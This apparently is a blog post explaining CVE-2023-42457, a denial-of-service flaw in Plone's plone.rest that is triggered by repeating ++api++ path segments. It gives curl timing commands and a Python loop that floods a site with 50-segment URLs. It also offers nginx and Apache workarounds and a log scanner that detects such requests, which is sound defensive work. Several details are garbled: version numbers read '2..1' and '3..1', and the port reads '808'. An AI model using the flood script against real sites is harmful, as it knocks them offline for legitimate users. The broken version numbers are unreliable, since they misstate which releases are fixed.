Plone is a popular open-source content management system (CMS) used by organizations around the world. Its plone.rest package enables modern RESTful HTTP verb support (GET, POST, PUT, DELETE, etc.) through special URL path handling. Recently, CVE-2023-42457 was reported, highlighting a subtle but impactful problem when its unique ++api++ traverser is used in a certain way.

This post will break down what happened, show the bug in action, discuss possible exploits, and point you to fixes and workarounds. All explained simply.

What is CVE-2023-42457?

CVE-2023-42457 is a vulnerability that affects Plone installations using plone.rest versions 2.x before 2..1 and 3.x before 3..1. The bug does not exist in the older 1.x branch.

The Problem

When an attacker puts ++api++ multiple times into the URL (for example, /++api++/++api++/...), Plone's traversal code starts to take more and more time for each extra ++api++ segment. This isn't a crash or data leak, but it slows the server down—potentially to the point where it's unresponsive and can't handle legitimate traffic.

Long story short: Plone starts to crawl to a halt as the ++api++ segments pile up.

Code Example: How An Attacker Could Slow Down Your Site

The critical part is that no authentication is needed—anyone can do this.

A normal REST API call looks like this:

GET /plone/++api++/users

But if someone sends

GET /plone/++api++/++api++/++api++/users

or even

GET /plone/++api++/++api++/++api++/++api++/.../users

(filling the URL with lots of ++api++), the server starts doing more work for each extra segment, tying up resources.

Quick demonstration (using curl)

# Safe/normal call:
curl -w "\nTime: %{time_total}\n" -o /dev/null -s http://localhost:808/plone/++api++/users

# Malicious/slow call (with repeated traverser):
curl -w "\nTime: %{time_total}\n" -o /dev/null -s http://localhost:808/plone/++api++/++api++/++api++/users

On a vulnerable system, the second call can take seconds or more, even with just a few repetitions. A well-crafted attack with many repetitions can lock up server threads, causing a mini-denial of service (DoS).

Why Did This Happen?

Inside Plone, the ++api++ syntax is a special path traverser—a way for the system to route REST API calls. The code didn't guard against nested or repeated traversers; each repetition made the traversal logic start over or become more expensive.

This is known as a "path traversal amplification" bug—it doesn’t expose sensitive data, but multiplies server workload per abnormal URL.

plone.rest 1.x branch not affected

If you use plone.rest for your APIs and your URLs support /++api++, check your version.

Official Patch

Upgrading to either plone.rest 2..1 or 3..1 will fully close the bug. Both are available on PyPI and recommended by the core team.

> Download and release notes:
> - plone.rest 2..1 on PyPI
> - plone.rest 3..1 on PyPI
> - GitHub Advisory

Workaround until you can upgrade: redirect multiple traversers to just one (nginx)

# Collapse two or more consecutive ++api++ segments into a single one and redirect
# there; $1 is everything before the run, $3 everything after it, query string kept.
location ~ ^(.*?/)(\+\+api\+\+/){2,}(.*)$ {
    return 301 $1++api++/$3$is_args$args;
}

Use mod_rewrite (Apache)

RewriteEngine On
# Collapse two or more consecutive ++api++ segments into one and redirect there
# (virtual-host context; mod_rewrite carries the original query string over).
RewriteRule ^(.*?/)(?:\+\+api\+\+/){2,}(.*)$ $1++api++/$2 [L,R=301]

Remember: This is not a substitute for upgrading, just a safety net.

Exploit Details: Is This Really Dangerous?

The exploit is not about stealing information—it's about starving the system's resources. Someone could run a simple Python script that spams your server with a bunch of URLs like /++api++/++api++/..., tying up all worker threads.

Example attack code

import requests

# Build a path with 50 repeated ++api++ segments, then request it repeatedly.
url = "http://your-plone-site/plone/" + "++api++/" * 50 + "users"
for i in range(100):
    requests.get(url)

If you have a small number of threads serving requests, this tiny script could keep all of them busy with slow requests—making your website hang for everyone else (i.e., "DoS").

References & Further Reading

- CVE listing on NVD
- plone.rest 2..1 release notes
- plone.rest 3..1 release notes
- Plone official security documentation
- GitHub - plone.rest

Monitor your logs for odd-looking API paths.
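As an added example (not code from the original post or from the plone.rest project), here is a small Python scanner for that log check: it parses combined-format access log lines, measures the longest run of consecutive ++api++ segments in each request path (also catching the %2B%2B-encoded form), flags anything with two or more, and tallies hits per client address. The log lines are constructed for illustration.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [21/Sep/2023:15:20:01 +0000] "GET /plone/++api++/users HTTP/1.1" 200 512 "-" "curl/8.0"
203.0.113.7 - - [21/Sep/2023:15:20:02 +0000] "GET /plone/++api++/++api++/++api++/users HTTP/1.1" 200 512 "-" "curl/8.0"
198.51.100.9 - - [21/Sep/2023:15:20:03 +0000] "GET /plone/%2B%2Bapi%2B%2B/%2B%2Bapi%2B%2B/@search?b_size=5 HTTP/1.1" 200 2048 "-" "python-requests"
203.0.113.7 - - [21/Sep/2023:15:20:04 +0000] "GET /plone/news/++api++/ HTTP/1.1" 200 100 "-" "Mozilla/5.0"
"""

# Minimal combined-log-format parser: only the client IP, method and path are needed.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*"'
)


def api_segment_run(path: str) -> int:
    """Longest run of consecutive '++api++' segments in a request path.
    The query string is dropped and percent-encoding undone first, so
    /%2B%2Bapi%2B%2B/ counts the same as /++api++/.
    """
    segments = unquote(path.split("?", 1)[0]).split("/")
    longest = current = 0
    for seg in segments:
        current = current + 1 if seg == "++api++" else 0
        longest = max(longest, current)
    return longest


def find_repeated_traversers(log_text: str, threshold: int = 2) -> list:
    """Return (ip, path, run) for each request whose longest ++api++ run
    reaches `threshold`; a single ++api++ segment is a normal REST call."""
    hits = []
    for line in log_text.splitlines():
        match = LOG_RE.match(line)
        if not match:
            continue  # not a combined-format line; ignore it
        run = api_segment_run(match.group("path"))
        if run >= threshold:
            hits.append((match.group("ip"), match.group("path"), run))
    return hits


def hits_per_client(hits) -> Counter:
    """Tally flagged requests per client IP for rate-limit or block decisions."""
    return Counter(ip for ip, _, _ in hits)
```

Feed it your real access log instead of SAMPLE_LOG and alert on any client whose tally keeps growing; a threshold of 2 matches the {2,} pattern used in the proxy workarounds above.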

While this bug doesn't leak data, every minute your site is slow or unavailable is a problem! Keeping up to date and monitoring your endpoints is the best defense.


Any questions or experiences? Share below! Stay safe, Plone admins.


> _This post is exclusive and written simply for administrators and developers running Plone with plone.rest enabled._

Timeline

Published on: 09/21/2023 15:15:00 UTC
Last modified on: 09/25/2023 18:53:00 UTC